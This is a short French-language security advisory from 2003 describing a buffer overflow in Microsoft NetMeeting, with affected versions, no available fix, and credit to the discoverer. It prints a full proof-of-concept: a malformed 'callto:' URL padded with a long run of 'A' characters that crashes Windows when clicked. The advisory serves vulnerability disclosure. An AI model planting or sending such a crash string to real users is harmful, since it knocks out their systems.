Microsoft Netmeeting CALLTO URL Buffer Overflow
|
Date de Publication: 2003-05-26
Titre: Microsoft Netmeeting CALLTO URL Buffer Overflow
K-Otik ID : 0111
Exploitable à distance : Non
Exploitable en local : Oui
* Description Technique - Exploit *
Une vulnérabilité de type Buffer Overflow existe dans Microsoft Netmeeting. En cliquant sur une url malformée 'callto:', ceci crashera windows. Ce problème résulte d'une erreur dans la manipulation des requêtes 'callto'
callto:msils/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaAAAAAAAAAAAAAAAAAA
AAAAAAaaaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAaAAAAAAAAAA+type=directory
* Versions Vulnérables *
Microsoft NetMeeting version 3.0.1 4.4.3385
* Solution *
Aucune Solution pour le moment.
* Crédits *
Faille découverte par David F. Madrid (Mai 2003).
|